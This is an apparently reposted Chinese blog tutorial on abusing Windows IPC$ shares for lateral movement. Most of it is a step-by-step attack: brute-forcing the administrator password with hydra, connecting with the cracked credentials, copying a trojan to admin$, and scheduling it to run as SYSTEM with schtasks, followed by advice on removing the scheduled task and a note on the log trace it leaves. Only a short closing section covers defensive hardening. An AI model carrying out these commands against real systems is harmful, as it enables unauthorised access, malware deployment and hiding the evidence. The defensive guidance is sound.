IPC$ 共享简述【转载】

类别:Win其它 / 日期:2024-08-06 / 浏览:62 / 评论:0

0x00 前言

IPC$(Internet process connection),是window系统让进程间通信而开放的命名管道。

系统会默认开启IPC$共享文件服务。我们可以通过IPC获取目标的文件管理权限,上传生成的木马后,建立定时任务,实现横向渗透。

0x01 利用

1.1 利用条件

一般情况下系统都会默认开启IPC$服务。


image.png


开放了139或445端口

1.2 命令

一些常用的命令:

net share       #查看自己的共享
net view \\127.0.0.1   #查看目标共享资源
net use \\127.0.0.1\ipc$ "" /user:""  #建立空连接
net use \\127.0.0.1\ipc$ "password" /user:"username"  #建立完整连接
net use \\127.0.0.1\ipc$ /del  #删除IPC$连接
net use z: \\127.0.0.1\c$   #直接访问
net use c: /del        #删除映射的c盘
net use * /del /y      #删除全部连接不提示
net use\\去连接的IP地址\ipc$ "域成员密码"  /user:域名\域成员账号
dir \\momaek.com\c$
copy test.exe \\127.0.0.1\admin$ 复制文件至目标服务器的共享目录c盘的Windows目录下
copy test.exe \\momaek.com\c$ 
net use \\192.168.100.1\ipc$ /del 删除ipc$连接

1.3 利用过程

使用工具爆破出账户名密码。

hydra -l administrator -P pwd.txt -f 192.168.30.136 smb


image.png


使用net use \\192.168.30.136\ipc$ "QWEqwe123" /user:"administrator"建立连接。


image.png


然后上传生成好的木马文件。

copy C:\Users\USER\Desktop\test.exe \\192.168.30.136\admin$


image.png


也可以使用net use k: \\192.168.30.136\c$ /u:"administrator" "QWEqwe123"映射磁盘进行操作。


image.png
image.png


使用schtask创建计划任务。

上传生成好的木马文件会存放在c盘的Windows目录下。

schtasks /create /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test /sc minute /mo 1 /tr C:\Windows\test.exe /ru system /f


image.png


查看一下计划任务。

schtasks /query /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test


image.png


拿到权限。


image.png


注意使用schtasks时会在C:\Windows\Tasks\SchedLgU.txt留下痕迹。

利用完成后使用:

schtasks /delete /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test删除计划任务。


image.png


1.3 会出现的问题

现在高版本的IPC$共享空连接的一些基础查询都会拒绝访问。

也有可能是使用的用户不是管理员权限。


image.png


发生系统错误 1219

是因为IPC$在同一时间内,两个IP之间只允许建立一个连接。

使用net use \\192.168.30.136\ipc$ /del重新连接即可。


image.png


还有一些其他的问题:

错误号51   #Windows无法找到网络路径:网络有问题;
错误号53   #找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67   #找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1792 #试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242 #此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

1.4 如何防范ipc$入侵

删除共享:

net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete


image.png


停止server服务,但重启后会重新启动该服务。

net stop server /y


image.png


通过修改注册表禁止自动打开默认共享:

禁止C$、D$、E$一类的共享:
在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
新建一个DOWRD值“AutoShareServer”设置为“0”。
禁止ADMIN$共享:
新建一个DOWRD值“AutoShareWKs”设置为“0”。


image.png


打赏

感谢您的赞助~

打开支付宝扫一扫,即可进行扫码打赏哦~

版权声明 : 本文未使用任何知识共享协议授权,您可以任何形式自由转载或使用。

 可能感兴趣的文章

win7能ping通但不能访问共享解决方法
win7能ping通但不能访问共享解决方法

win7能ping通但不能访问共享怎么办?很多小伙伴经常询问小编有关于共享文件的相关内容,但是很多小伙伴经常询问小编有关共享的时候能ping统但是没有权限或者是无法访问的相关问题,那么接下来一起看看w...

win10输入法的选字框不见了解决方法
win10输入法的选字框不见了解决方法

近期用户在使用win10系统打字的时候,发现自己的选字框经常会消失,并且这种情况也是时不时出现,win10输入法的选字框不见了怎么办?win10输入法的选字框不见了解决方法:方法一:更换到以前版本1、...

MID函数应用:EXCEL提取小数第三位数字,等等
MID函数应用:EXCEL提取小数第三位数字,等等

MID函数是从任意位置提取指定数目的字符。=MID(①在哪里提取,②指定提取位置,③提取的字符数量)如果要实现更加灵活地提取数据,②这个参数可以使用函数来自动判断从哪个位置开始提取。经常会嵌套LEN、...

热门文章

标签列表